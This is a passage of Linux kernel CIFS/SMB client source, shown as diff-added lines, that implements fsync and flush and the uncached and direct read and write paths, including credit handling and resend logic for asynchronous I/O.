++	cifs_dbg(FYI, "Sync file - name: %pD datasync: 0x%x\n",
++		 file, datasync);
++
++	tcon = tlink_tcon(smbfile->tlink);
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOSSYNC)) {
++		server = tcon->ses->server;
++		if (server->ops->flush == NULL) {
++			rc = -ENOSYS;
++			goto fsync_exit;
++		}
++
++		if ((OPEN_FMODE(smbfile->f_flags) & FMODE_WRITE) == 0) {
++			smbfile = find_writable_file(CIFS_I(inode), FIND_WR_ANY);
++			if (smbfile) {
++				rc = server->ops->flush(xid, tcon, &smbfile->fid);
++				cifsFileInfo_put(smbfile);
++			} else
++				cifs_dbg(FYI, "ignore fsync for file not open for write\n");
++		} else
++			rc = server->ops->flush(xid, tcon, &smbfile->fid);
++	}
++
++fsync_exit:
++	free_xid(xid);
++	return rc;
++}
++
++/*
++ * As file closes, flush all cached write data for this inode checking
++ * for write behind errors.
++ */
++int cifs_flush(struct file *file, fl_owner_t id)
++{
++	struct inode *inode = file_inode(file);
++	int rc = 0;
++
++	if (file->f_mode & FMODE_WRITE)
++		rc = filemap_write_and_wait(inode->i_mapping);
++
++	cifs_dbg(FYI, "Flush inode %p file %p rc %d\n", inode, file, rc);
++	if (rc) {
++		/* get more nuanced writeback errors */
++		rc = filemap_check_wb_err(file->f_mapping, 0);
++		trace_cifs_flush_err(inode->i_ino, rc);
++	}
++	return rc;
++}
++
++static int
++cifs_write_allocate_pages(struct page **pages, unsigned long num_pages)
++{
++	int rc = 0;
++	unsigned long i;
++
++	for (i = 0; i < num_pages; i++) {
++		pages[i] = alloc_page(GFP_KERNEL|__GFP_HIGHMEM);
++		if (!pages[i]) {
++			/*
++			 * save number of pages we have already allocated and
++			 * return with ENOMEM error
++			 */
++			num_pages = i;
++			rc = -ENOMEM;
++			break;
++		}
++	}
++
++	if (rc) {
++		for (i = 0; i < num_pages; i++)
++			put_page(pages[i]);
++	}
++	return rc;
++}
++
++static inline
++size_t get_numpages(const size_t wsize, const size_t len, size_t *cur_len)
++{
++	size_t num_pages;
++	size_t clen;
++
++	clen = min_t(const size_t, len, wsize);
++	num_pages = DIV_ROUND_UP(clen, PAGE_SIZE);
++
++	if (cur_len)
++		*cur_len = clen;
++
++	return num_pages;
++}
++
++static void
++cifs_uncached_writedata_release(struct kref *refcount)
++{
++	int i;
++	struct cifs_writedata *wdata = container_of(refcount,
++					struct cifs_writedata, refcount);
++
++	kref_put(&wdata->ctx->refcount, cifs_aio_ctx_release);
++	for (i = 0; i < wdata->nr_pages; i++)
++		put_page(wdata->pages[i]);
++	cifs_writedata_release(refcount);
++}
++
++static void collect_uncached_write_data(struct cifs_aio_ctx *ctx);
++
++static void
++cifs_uncached_writev_complete(struct work_struct *work)
++{
++	struct cifs_writedata *wdata = container_of(work,
++					struct cifs_writedata, work);
++	struct inode *inode = d_inode(wdata->cfile->dentry);
++	struct cifsInodeInfo *cifsi = CIFS_I(inode);
++
++	spin_lock(&inode->i_lock);
++	cifs_update_eof(cifsi, wdata->offset, wdata->bytes);
++	if (cifsi->server_eof > inode->i_size)
++		i_size_write(inode, cifsi->server_eof);
++	spin_unlock(&inode->i_lock);
++
++	complete(&wdata->done);
++	collect_uncached_write_data(wdata->ctx);
++	/* the below call can possibly free the last ref to aio ctx */
++	kref_put(&wdata->refcount, cifs_uncached_writedata_release);
++}
++
++static int
++wdata_fill_from_iovec(struct cifs_writedata *wdata, struct iov_iter *from,
++		      size_t *len, unsigned long *num_pages)
++{
++	size_t save_len, copied, bytes, cur_len = *len;
++	unsigned long i, nr_pages = *num_pages;
++
++	save_len = cur_len;
++	for (i = 0; i < nr_pages; i++) {
++		bytes = min_t(const size_t, cur_len, PAGE_SIZE);
++		copied = copy_page_from_iter(wdata->pages[i], 0, bytes, from);
++		cur_len -= copied;
++		/*
++		 * If we didn't copy as much as we expected, then that
++		 * may mean we trod into an unmapped area. Stop copying
++		 * at that point. On the next pass through the big
++		 * loop, we'll likely end up getting a zero-length
++		 * write and bailing out of it.
++		 */
++		if (copied < bytes)
++			break;
++	}
++	cur_len = save_len - cur_len;
++	*len = cur_len;
++
++	/*
++	 * If we have no data to send, then that probably means that
++	 * the copy above failed altogether. That's most likely because
++	 * the address in the iovec was bogus. Return -EFAULT and let
++	 * the caller free anything we allocated and bail out.
++	 */
++	if (!cur_len)
++		return -EFAULT;
++
++	/*
++	 * i + 1 now represents the number of pages we actually used in
++	 * the copy phase above.
++	 */
++	*num_pages = i + 1;
++	return 0;
++}
++
++static int
++cifs_resend_wdata(struct cifs_writedata *wdata, struct list_head *wdata_list,
++	struct cifs_aio_ctx *ctx)
++{
++	unsigned int wsize;
++	struct cifs_credits credits;
++	int rc;
++	struct TCP_Server_Info *server = wdata->server;
++
++	do {
++		if (wdata->cfile->invalidHandle) {
++			rc = cifs_reopen_file(wdata->cfile, false);
++			if (rc == -EAGAIN)
++				continue;
++			else if (rc)
++				break;
++		}
++
++
++		/*
++		 * Wait for credits to resend this wdata.
++		 * Note: we are attempting to resend the whole wdata not in
++		 * segments
++		 */
++		do {
++			rc = server->ops->wait_mtu_credits(server, wdata->bytes,
++						&wsize, &credits);
++			if (rc)
++				goto fail;
++
++			if (wsize < wdata->bytes) {
++				add_credits_and_wake_if(server, &credits, 0);
++				msleep(1000);
++			}
++		} while (wsize < wdata->bytes);
++		wdata->credits = credits;
++
++		rc = adjust_credits(server, &wdata->credits, wdata->bytes);
++
++		if (!rc) {
++			if (wdata->cfile->invalidHandle)
++				rc = -EAGAIN;
++			else {
++#ifdef CONFIG_CIFS_SMB_DIRECT
++				if (wdata->mr) {
++					wdata->mr->need_invalidate = true;
++					smbd_deregister_mr(wdata->mr);
++					wdata->mr = NULL;
++				}
++#endif
++				rc = server->ops->async_writev(wdata,
++					cifs_uncached_writedata_release);
++			}
++		}
++
++		/* If the write was successfully sent, we are done */
++		if (!rc) {
++			list_add_tail(&wdata->list, wdata_list);
++			return 0;
++		}
++
++		/* Roll back credits and retry if needed */
++		add_credits_and_wake_if(server, &wdata->credits, 0);
++	} while (rc == -EAGAIN);
++
++fail:
++	kref_put(&wdata->refcount, cifs_uncached_writedata_release);
++	return rc;
++}
++
++static int
++cifs_write_from_iter(loff_t offset, size_t len, struct iov_iter *from,
++		     struct cifsFileInfo *open_file,
++		     struct cifs_sb_info *cifs_sb, struct list_head *wdata_list,
++		     struct cifs_aio_ctx *ctx)
++{
++	int rc = 0;
++	size_t cur_len;
++	unsigned long nr_pages, num_pages, i;
++	struct cifs_writedata *wdata;
++	struct iov_iter saved_from = *from;
++	loff_t saved_offset = offset;
++	pid_t pid;
++	struct TCP_Server_Info *server;
++	struct page **pagevec;
++	size_t start;
++	unsigned int xid;
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
++		pid = open_file->pid;
++	else
++		pid = current->tgid;
++
++	server = cifs_pick_channel(tlink_tcon(open_file->tlink)->ses);
++	xid = get_xid();
++
++	do {
++		unsigned int wsize;
++		struct cifs_credits credits_on_stack;
++		struct cifs_credits *credits = &credits_on_stack;
++
++		if (open_file->invalidHandle) {
++			rc = cifs_reopen_file(open_file, false);
++			if (rc == -EAGAIN)
++				continue;
++			else if (rc)
++				break;
++		}
++
++		rc = server->ops->wait_mtu_credits(server, cifs_sb->ctx->wsize,
++						   &wsize, credits);
++		if (rc)
++			break;
++
++		cur_len = min_t(const size_t, len, wsize);
++
++		if (ctx->direct_io) {
++			ssize_t result;
++
++			result = iov_iter_get_pages_alloc2(
++				from, &pagevec, cur_len, &start);
++			if (result < 0) {
++				cifs_dbg(VFS,
++					 "direct_writev couldn't get user pages (rc=%zd) iter type %d iov_offset %zd count %zd\n",
++					 result, iov_iter_type(from),
++					 from->iov_offset, from->count);
++				dump_stack();
++
++				rc = result;
++				add_credits_and_wake_if(server, credits, 0);
++				break;
++			}
++			cur_len = (size_t)result;
++
++			nr_pages =
++				(cur_len + start + PAGE_SIZE - 1) / PAGE_SIZE;
++
++			wdata = cifs_writedata_direct_alloc(pagevec,
++					     cifs_uncached_writev_complete);
++			if (!wdata) {
++				rc = -ENOMEM;
++				for (i = 0; i < nr_pages; i++)
++					put_page(pagevec[i]);
++				kvfree(pagevec);
++				add_credits_and_wake_if(server, credits, 0);
++				break;
++			}
++
++
++			wdata->page_offset = start;
++			wdata->tailsz =
++				nr_pages > 1 ?
++					cur_len - (PAGE_SIZE - start) -
++					(nr_pages - 2) * PAGE_SIZE :
++					cur_len;
++		} else {
++			nr_pages = get_numpages(wsize, len, &cur_len);
++			wdata = cifs_writedata_alloc(nr_pages,
++					     cifs_uncached_writev_complete);
++			if (!wdata) {
++				rc = -ENOMEM;
++				add_credits_and_wake_if(server, credits, 0);
++				break;
++			}
++
++			rc = cifs_write_allocate_pages(wdata->pages, nr_pages);
++			if (rc) {
++				kvfree(wdata->pages);
++				kfree(wdata);
++				add_credits_and_wake_if(server, credits, 0);
++				break;
++			}
++
++			num_pages = nr_pages;
++			rc = wdata_fill_from_iovec(
++				wdata, from, &cur_len, &num_pages);
++			if (rc) {
++				for (i = 0; i < nr_pages; i++)
++					put_page(wdata->pages[i]);
++				kvfree(wdata->pages);
++				kfree(wdata);
++				add_credits_and_wake_if(server, credits, 0);
++				break;
++			}
++
++			/*
++			 * Bring nr_pages down to the number of pages we
++			 * actually used, and free any pages that we didn't use.
++			 */
++			for ( ; nr_pages > num_pages; nr_pages--)
++				put_page(wdata->pages[nr_pages - 1]);
++
++			wdata->tailsz = cur_len - ((nr_pages - 1) * PAGE_SIZE);
++		}
++
++		wdata->sync_mode = WB_SYNC_ALL;
++		wdata->nr_pages = nr_pages;
++		wdata->offset = (__u64)offset;
++		wdata->cfile = cifsFileInfo_get(open_file);
++		wdata->server = server;
++		wdata->pid = pid;
++		wdata->bytes = cur_len;
++		wdata->pagesz = PAGE_SIZE;
++		wdata->credits = credits_on_stack;
++		wdata->ctx = ctx;
++		kref_get(&ctx->refcount);
++
++		rc = adjust_credits(server, &wdata->credits, wdata->bytes);
++
++		if (!rc) {
++			if (wdata->cfile->invalidHandle)
++				rc = -EAGAIN;
++			else
++				rc = server->ops->async_writev(wdata,
++					cifs_uncached_writedata_release);
++		}
++
++		if (rc) {
++			add_credits_and_wake_if(server, &wdata->credits, 0);
++			kref_put(&wdata->refcount,
++				 cifs_uncached_writedata_release);
++			if (rc == -EAGAIN) {
++				*from = saved_from;
++				iov_iter_advance(from, offset - saved_offset);
++				continue;
++			}
++			break;
++		}
++
++		list_add_tail(&wdata->list, wdata_list);
++		offset += cur_len;
++		len -= cur_len;
++	} while (len > 0);
++
++	free_xid(xid);
++	return rc;
++}
++
++static void collect_uncached_write_data(struct cifs_aio_ctx *ctx)
++{
++	struct cifs_writedata *wdata, *tmp;
++	struct cifs_tcon *tcon;
++	struct cifs_sb_info *cifs_sb;
++	struct dentry *dentry = ctx->cfile->dentry;
++	ssize_t rc;
++
++	tcon = tlink_tcon(ctx->cfile->tlink);
++	cifs_sb = CIFS_SB(dentry->d_sb);
++
++	mutex_lock(&ctx->aio_mutex);
++
++	if (list_empty(&ctx->list)) {
++		mutex_unlock(&ctx->aio_mutex);
++		return;
++	}
++
++	rc = ctx->rc;
++	/*
++	 * Wait for and collect replies for any successful sends in order of
++	 * increasing offset. Once an error is hit, then return without waiting
++	 * for any more replies.
++	 */
++restart_loop:
++	list_for_each_entry_safe(wdata, tmp, &ctx->list, list) {
++		if (!rc) {
++			if (!try_wait_for_completion(&wdata->done)) {
++				mutex_unlock(&ctx->aio_mutex);
++				return;
++			}
++
++			if (wdata->result)
++				rc = wdata->result;
++			else
++				ctx->total_len += wdata->bytes;
++
++			/* resend call if it's a retryable error */
++			if (rc == -EAGAIN) {
++				struct list_head tmp_list;
++				struct iov_iter tmp_from = ctx->iter;
++
++				INIT_LIST_HEAD(&tmp_list);
++				list_del_init(&wdata->list);
++
++				if (ctx->direct_io)
++					rc = cifs_resend_wdata(
++						wdata, &tmp_list, ctx);
++				else {
++					iov_iter_advance(&tmp_from,
++						 wdata->offset - ctx->pos);
++
++					rc = cifs_write_from_iter(wdata->offset,
++						wdata->bytes, &tmp_from,
++						ctx->cfile, cifs_sb, &tmp_list,
++						ctx);
++
++					kref_put(&wdata->refcount,
++						cifs_uncached_writedata_release);
++				}
++
++				list_splice(&tmp_list, &ctx->list);
++				goto restart_loop;
++			}
++		}
++		list_del_init(&wdata->list);
++		kref_put(&wdata->refcount, cifs_uncached_writedata_release);
++	}
++
++	cifs_stats_bytes_written(tcon, ctx->total_len);
++	set_bit(CIFS_INO_INVALID_MAPPING, &CIFS_I(dentry->d_inode)->flags);
++
++	ctx->rc = (rc == 0) ? ctx->total_len : rc;
++
++	mutex_unlock(&ctx->aio_mutex);
++
++	if (ctx->iocb && ctx->iocb->ki_complete)
++		ctx->iocb->ki_complete(ctx->iocb, ctx->rc);
++	else
++		complete(&ctx->done);
++}
++
++static ssize_t __cifs_writev(
++	struct kiocb *iocb, struct iov_iter *from, bool direct)
++{
++	struct file *file = iocb->ki_filp;
++	ssize_t total_written = 0;
++	struct cifsFileInfo *cfile;
++	struct cifs_tcon *tcon;
++	struct cifs_sb_info *cifs_sb;
++	struct cifs_aio_ctx *ctx;
++	struct iov_iter saved_from = *from;
++	size_t len = iov_iter_count(from);
++	int rc;
++
++	/*
++	 * iov_iter_get_pages_alloc doesn't work with ITER_KVEC.
++	 * In this case, fall back to non-direct write function.
++	 * this could be improved by getting pages directly in ITER_KVEC
++	 */
++	if (direct && iov_iter_is_kvec(from)) {
++		cifs_dbg(FYI, "use non-direct cifs_writev for kvec I/O\n");
++		direct = false;
++	}
++
++	rc = generic_write_checks(iocb, from);
++	if (rc <= 0)
++		return rc;
++
++	cifs_sb = CIFS_FILE_SB(file);
++	cfile = file->private_data;
++	tcon = tlink_tcon(cfile->tlink);
++
++	if (!tcon->ses->server->ops->async_writev)
++		return -ENOSYS;
++
++	ctx = cifs_aio_ctx_alloc();
++	if (!ctx)
++		return -ENOMEM;
++
++	ctx->cfile = cifsFileInfo_get(cfile);
++
++	if (!is_sync_kiocb(iocb))
++		ctx->iocb = iocb;
++
++	ctx->pos = iocb->ki_pos;
++
++	if (direct) {
++		ctx->direct_io = true;
++		ctx->iter = *from;
++		ctx->len = len;
++	} else {
++		rc = setup_aio_ctx_iter(ctx, from, ITER_SOURCE);
++		if (rc) {
++			kref_put(&ctx->refcount, cifs_aio_ctx_release);
++			return rc;
++		}
++	}
++
++	/* grab a lock here due to read response handlers can access ctx */
++	mutex_lock(&ctx->aio_mutex);
++
++	rc = cifs_write_from_iter(iocb->ki_pos, ctx->len, &saved_from,
++				  cfile, cifs_sb, &ctx->list, ctx);
++
++	/*
++	 * If at least one write was successfully sent, then discard any rc
++	 * value from the later writes. If the other write succeeds, then
++	 * we'll end up returning whatever was written. If it fails, then
++	 * we'll get a new rc value from that.
++	 */
++	if (!list_empty(&ctx->list))
++		rc = 0;
++
++	mutex_unlock(&ctx->aio_mutex);
++
++	if (rc) {
++		kref_put(&ctx->refcount, cifs_aio_ctx_release);
++		return rc;
++	}
++
++	if (!is_sync_kiocb(iocb)) {
++		kref_put(&ctx->refcount, cifs_aio_ctx_release);
++		return -EIOCBQUEUED;
++	}
++
++	rc = wait_for_completion_killable(&ctx->done);
++	if (rc) {
++		mutex_lock(&ctx->aio_mutex);
++		ctx->rc = rc = -EINTR;
++		total_written = ctx->total_len;
++		mutex_unlock(&ctx->aio_mutex);
++	} else {
++		rc = ctx->rc;
++		total_written = ctx->total_len;
++	}
++
++	kref_put(&ctx->refcount, cifs_aio_ctx_release);
++
++	if (unlikely(!total_written))
++		return rc;
++
++	iocb->ki_pos += total_written;
++	return total_written;
++}
++
++ssize_t cifs_direct_writev(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct file *file = iocb->ki_filp;
++
++	cifs_revalidate_mapping(file->f_inode);
++	return __cifs_writev(iocb, from, true);
++}
++
++ssize_t cifs_user_writev(struct kiocb *iocb, struct iov_iter *from)
++{
++	return __cifs_writev(iocb, from, false);
++}
++
++static ssize_t
++cifs_writev(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct file *file = iocb->ki_filp;
++	struct cifsFileInfo *cfile = (struct cifsFileInfo *)file->private_data;
++	struct inode *inode = file->f_mapping->host;
++	struct cifsInodeInfo *cinode = CIFS_I(inode);
++	struct TCP_Server_Info *server = tlink_tcon(cfile->tlink)->ses->server;
++	ssize_t rc;
++
++	inode_lock(inode);
++	/*
++	 * We need to hold the sem to be sure nobody modifies lock list
++	 * with a brlock that prevents writing.
++	 */
++	down_read(&cinode->lock_sem);
++
++	rc = generic_write_checks(iocb, from);
++	if (rc <= 0)
++		goto out;
++
++	if (!cifs_find_lock_conflict(cfile, iocb->ki_pos, iov_iter_count(from),
++				     server->vals->exclusive_lock_type, 0,
++				     NULL, CIFS_WRITE_OP))
++		rc = __generic_file_write_iter(iocb, from);
++	else
++		rc = -EACCES;
++out:
++	up_read(&cinode->lock_sem);
++	inode_unlock(inode);
++
++	if (rc > 0)
++		rc = generic_write_sync(iocb, rc);
++	return rc;
++}
++
++ssize_t
++cifs_strict_writev(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct cifsInodeInfo *cinode = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct cifsFileInfo *cfile = (struct cifsFileInfo *)
++						iocb->ki_filp->private_data;
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	ssize_t written;
++
++	written = cifs_get_writer(cinode);
++	if (written)
++		return written;
++
++	if (CIFS_CACHE_WRITE(cinode)) {
++		if (cap_unix(tcon->ses) &&
++		(CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability))
++		  && ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0)) {
++			written = generic_file_write_iter(iocb, from);
++			goto out;
++		}
++		written = cifs_writev(iocb, from);
++		goto out;
++	}
++	/*
++	 * For non-oplocked files in strict cache mode we need to write the data
++	 * to the server exactly from the pos to pos+len-1 rather than flush all
++	 * affected pages because it may cause a error with mandatory locks on
++	 * these pages but not on the region from pos to ppos+len-1.
++	 */
++	written = cifs_user_writev(iocb, from);
++	if (CIFS_CACHE_READ(cinode)) {
++		/*
++		 * We have read level caching and we have just sent a write
++		 * request to the server thus making data in the cache stale.
++		 * Zap the cache and set oplock/lease level to NONE to avoid
++		 * reading stale data from the cache. All subsequent read
++		 * operations will read new data from the server.
++		 */
++		cifs_zap_mapping(inode);
++		cifs_dbg(FYI, "Set Oplock/Lease to NONE for inode=%p after write\n",
++			 inode);
++		cinode->oplock = 0;
++	}
++out:
++	cifs_put_writer(cinode);
++	return written;
++}
++
++static struct cifs_readdata *
++cifs_readdata_direct_alloc(struct page **pages, work_func_t complete)
++{
++	struct cifs_readdata *rdata;
++
++	rdata = kzalloc(sizeof(*rdata), GFP_KERNEL);
++	if (rdata != NULL) {
++		rdata->pages = pages;
++		kref_init(&rdata->refcount);
++		INIT_LIST_HEAD(&rdata->list);
++		init_completion(&rdata->done);
++		INIT_WORK(&rdata->work, complete);
++	}
++
++	return rdata;
++}
++
++static struct cifs_readdata *
++cifs_readdata_alloc(unsigned int nr_pages, work_func_t complete)
++{
++	struct page **pages =
++		kcalloc(nr_pages, sizeof(struct page *), GFP_KERNEL);
++	struct cifs_readdata *ret = NULL;
++
++	if (pages) {
++		ret = cifs_readdata_direct_alloc(pages, complete);
++		if (!ret)
++			kfree(pages);
++	}
++
++	return ret;
++}
++
++void
++cifs_readdata_release(struct kref *refcount)
++{
++	struct cifs_readdata *rdata = container_of(refcount,
++					struct cifs_readdata, refcount);
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	if (rdata->mr) {
++		smbd_deregister_mr(rdata->mr);
++		rdata->mr = NULL;
++	}
++#endif
++	if (rdata->cfile)
++		cifsFileInfo_put(rdata->cfile);
++
++	kvfree(rdata->pages);
++	kfree(rdata);
++}
++
++static int
++cifs_read_allocate_pages(struct cifs_readdata *rdata, unsigned int nr_pages)
++{
++	int rc = 0;
++	struct page *page;
++	unsigned int i;
++
++	for (i = 0; i < nr_pages; i++) {
++		page = alloc_page(GFP_KERNEL|__GFP_HIGHMEM);
++		if (!page) {
++			rc = -ENOMEM;
++			break;
++		}
++		rdata->pages[i] = page;
++	}
++
++	if (rc) {
++		unsigned int nr_page_failed = i;
++
++		for (i = 0; i < nr_page_failed; i++) {
++			put_page(rdata->pages[i]);
++			rdata->pages[i] = NULL;
++		}
++	}
++	return rc;
++}
++
++static void
++cifs_uncached_readdata_release(struct kref *refcount)
++{
++	struct cifs_readdata *rdata = container_of(refcount,
++					struct cifs_readdata, refcount);
++	unsigned int i;
++
++	kref_put(&rdata->ctx->refcount, cifs_aio_ctx_release);
++	for (i = 0; i < rdata->nr_pages; i++) {
++		put_page(rdata->pages[i]);
++	}
++	cifs_readdata_release(refcount);
++}
++
++/**
++ * cifs_readdata_to_iov - copy data from pages in response to an iovec
++ * @rdata:	the readdata response with list of pages holding data
++ * @iter:	destination for our data
++ *
++ * This function copies data from a list of pages in a readdata response into
++ * an array of iovecs. It will first calculate where the data should go
++ * based on the info in the readdata and then copy the data into that spot.
++ */
++static int
++cifs_readdata_to_iov(struct cifs_readdata *rdata, struct iov_iter *iter)
++{
++	size_t remaining = rdata->got_bytes;
++	unsigned int i;
++
++	for (i = 0; i < rdata->nr_pages; i++) {
++		struct page *page = rdata->pages[i];
++		size_t copy = min_t(size_t, remaining, PAGE_SIZE);
++		size_t written;
++
++		if (unlikely(iov_iter_is_pipe(iter))) {
++			void *addr = kmap_atomic(page);
++
++			written = copy_to_iter(addr, copy, iter);
++			kunmap_atomic(addr);
++		} else
++			written = copy_page_to_iter(page, 0, copy, iter);
++		remaining -= written;
++		if (written < copy && iov_iter_count(iter) > 0)
++			break;
++	}
++	return remaining ? -EFAULT : 0;
++}
++
++static void collect_uncached_read_data(struct cifs_aio_ctx *ctx);
++
++static void
++cifs_uncached_readv_complete(struct work_struct *work)
++{
++	struct cifs_readdata *rdata = container_of(work,
++						struct cifs_readdata, work);
++
++	complete(&rdata->done);
++	collect_uncached_read_data(rdata->ctx);
++	/* the below call can possibly free the last ref to aio ctx */
++	kref_put(&rdata->refcount, cifs_uncached_readdata_release);
++}
++
++static int
++uncached_fill_pages(struct TCP_Server_Info *server,
++		    struct cifs_readdata *rdata, struct iov_iter *iter,
++		    unsigned int len)
++{
++	int result = 0;
++	unsigned int i;
++	unsigned int nr_pages = rdata->nr_pages;
++	unsigned int page_offset = rdata->page_offset;
++
++	rdata->got_bytes = 0;
++	rdata->tailsz = PAGE_SIZE;
++	for (i = 0; i < nr_pages; i++) {
++		struct page *page = rdata->pages[i];
++		size_t n;
++		unsigned int segment_size = rdata->pagesz;
++
++		if (i == 0)
++			segment_size -= page_offset;
++		else
++			page_offset = 0;
++
++
++		if (len <= 0) {
++			/* no need to hold page hostage */
++			rdata->pages[i] = NULL;
++			rdata->nr_pages--;
++			put_page(page);
++			continue;
++		}
++
++		n = len;
++		if (len >= segment_size)
++			/* enough data to fill the page */
++			n = segment_size;
++		else
++			rdata->tailsz = len;
++		len -= n;
++
++		if (iter)
++			result = copy_page_from_iter(
++					page, page_offset, n, iter);
++#ifdef CONFIG_CIFS_SMB_DIRECT
++		else if (rdata->mr)
++			result = n;
++#endif
++		else
++			result = cifs_read_page_from_socket(
++					server, page, page_offset, n);
++		if (result < 0)
++			break;
++
++		rdata->got_bytes += result;
++	}
++
++	return result != -ECONNABORTED && rdata->got_bytes > 0 ?
++						rdata->got_bytes : result;
++}
++
++static int
++cifs_uncached_read_into_pages(struct TCP_Server_Info *server,
++			      struct cifs_readdata *rdata, unsigned int len)
++{
++	return uncached_fill_pages(server, rdata, NULL, len);
++}
++
++static int
++cifs_uncached_copy_into_pages(struct TCP_Server_Info *server,
++			      struct cifs_readdata *rdata,
++			      struct iov_iter *iter)
++{
++	return uncached_fill_pages(server, rdata, iter, iter->count);
++}
++
++static int cifs_resend_rdata(struct cifs_readdata *rdata,
++			struct list_head *rdata_list,
++			struct cifs_aio_ctx *ctx)
++{
++	unsigned int rsize;
++	struct cifs_credits credits;
++	int rc;
++	struct TCP_Server_Info *server;
++
++	/* XXX: should we pick a new channel here? */
++	server = rdata->server;
++
++	do {
++		if (rdata->cfile->invalidHandle) {
++			rc = cifs_reopen_file(rdata->cfile, true);
++			if (rc == -EAGAIN)
++				continue;
++			else if (rc)
++				break;
++		}
++
++		/*
++		 * Wait for credits to resend this rdata.
++		 * Note: we are attempting to resend the whole rdata not in
++		 * segments
++		 */
++		do {
++			rc = server->ops->wait_mtu_credits(server, rdata->bytes,
++						&rsize, &credits);
++
++			if (rc)
++				goto fail;
++
++			if (rsize < rdata->bytes) {
++				add_credits_and_wake_if(server, &credits, 0);
++				msleep(1000);
++			}
++		} while (rsize < rdata->bytes);
++		rdata->credits = credits;
++
++		rc = adjust_credits(server, &rdata->credits, rdata->bytes);
++		if (!rc) {
++			if (rdata->cfile->invalidHandle)
++				rc = -EAGAIN;
++			else {
++#ifdef CONFIG_CIFS_SMB_DIRECT
++				if (rdata->mr) {
++					rdata->mr->need_invalidate = true;
++					smbd_deregister_mr(rdata->mr);
++					rdata->mr = NULL;
++				}
++#endif
++				rc = server->ops->async_readv(rdata);
++			}
++		}
++
++		/* If the read was successfully sent, we are done */
++		if (!rc) {
++			/* Add to aio pending list */
++			list_add_tail(&rdata->list, rdata_list);
++			return 0;
++		}
++
++		/* Roll back credits and retry if needed */
++		add_credits_and_wake_if(server, &rdata->credits, 0);
++	} while (rc == -EAGAIN);
++
++fail:
++	kref_put(&rdata->refcount, cifs_uncached_readdata_release);
++	return rc;
++}
++
++static int
++cifs_send_async_read(loff_t offset, size_t len, struct cifsFileInfo *open_file,
++		     struct cifs_sb_info *cifs_sb, struct list_head *rdata_list,
++		     struct cifs_aio_ctx *ctx)
++{
++	struct cifs_readdata *rdata;
++	unsigned int npages, rsize;
++	struct cifs_credits credits_on_stack;
++	struct cifs_credits *credits = &credits_on_stack;
++	size_t cur_len;
++	int rc;
++	pid_t pid;
++	struct TCP_Server_Info *server;
++	struct page **pagevec;
++	size_t start;
++	struct iov_iter direct_iov = ctx->iter;
++
++	server = cifs_pick_channel(tlink_tcon(open_file->tlink)->ses);
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
++		pid = open_file->pid;
++	else
++		pid = current->tgid;
++
++	if (ctx->direct_io)
++		iov_iter_advance(&direct_iov, offset - ctx->pos);
++
++	do {
++		if (open_file->invalidHandle) {
++			rc = cifs_reopen_file(open_file, true);
++			if (rc == -EAGAIN)
++				continue;
++			else if (rc)
++				break;
++		}
++
++		if (cifs_sb->ctx->rsize == 0)
++			cifs_sb->ctx->rsize =
++				server->ops->negotiate_rsize(tlink_tcon(open_file->tlink),
++							     cifs_sb->ctx);
++
++		rc = server->ops->wait_mtu_credits(server, cifs_sb->ctx->rsize,
++						   &rsize, credits);
++		if (rc)
++			break;
++
++		cur_len = min_t(const size_t, len, rsize);
++
++		if (ctx->direct_io) {
++			ssize_t result;
++
++			result = iov_iter_get_pages_alloc2(
++					&direct_iov, &pagevec,
++					cur_len, &start);
++			if (result < 0) {
++				cifs_dbg(VFS,
++					 "Couldn't get user pages (rc=%zd) iter type %d iov_offset %zd count %zd\n",
++					 result, iov_iter_type(&direct_iov),
++					 direct_iov.iov_offset,
++					 direct_iov.count);
++				dump_stack();
++
++				rc = result;
++				add_credits_and_wake_if(server, credits, 0);
++				break;
++			}
++			cur_len = (size_t)result;
++
++			rdata = cifs_readdata_direct_alloc(
++					pagevec, cifs_uncached_readv_complete);
++			if (!rdata) {
++				add_credits_and_wake_if(server, credits, 0);
++				rc = -ENOMEM;
++				break;
++			}
++
++			npages = (cur_len + start + PAGE_SIZE-1) / PAGE_SIZE;
++			rdata->page_offset = start;
++			rdata->tailsz = npages > 1 ?
++				cur_len-(PAGE_SIZE-start)-(npages-2)*PAGE_SIZE :
++				cur_len;
++
++		} else {
++
++			npages = DIV_ROUND_UP(cur_len, PAGE_SIZE);
++			/* allocate a readdata struct */
++			rdata = cifs_readdata_alloc(npages,
++					    cifs_uncached_readv_complete);
++			if (!rdata) {
++				add_credits_and_wake_if(server, credits, 0);
++				rc = -ENOMEM;
++				break;
++			}
++
++			rc = cifs_read_allocate_pages(rdata, npages);
++			if (rc) {
++				kvfree(rdata->pages);
++				kfree(rdata);
++				add_credits_and_wake_if(server, credits, 0);
++				break;
++			}
++
++			rdata->tailsz = PAGE_SIZE;
++		}
++
++		rdata->server = server;
++		rdata->cfile = cifsFileInfo_get(open_file);
++		rdata->nr_pages = npages;
++		rdata->offset = offset;
++		rdata->bytes = cur_len;
++		rdata->pid = pid;
++		rdata->pagesz = PAGE_SIZE;
++		rdata->read_into_pages = cifs_uncached_read_into_pages;
++		rdata->copy_into_pages = cifs_uncached_copy_into_pages;
++		rdata->credits = credits_on_stack;
++		rdata->ctx = ctx;
++		kref_get(&ctx->refcount);
++
++		rc = adjust_credits(server, &rdata->credits, rdata->bytes);
++
++		if (!rc) {
++			if (rdata->cfile->invalidHandle)
++				rc = -EAGAIN;
++			else
++				rc = server->ops->async_readv(rdata);
++		}
++
++		if (rc) {
++			add_credits_and_wake_if(server, &rdata->credits, 0);
++			kref_put(&rdata->refcount,
++				cifs_uncached_readdata_release);
++			if (rc == -EAGAIN) {
++				iov_iter_revert(&direct_iov, cur_len);
++				continue;
++			}
++			break;
++		}
++
++		list_add_tail(&rdata->list, rdata_list);
++		offset += cur_len;
++		len -= cur_len;
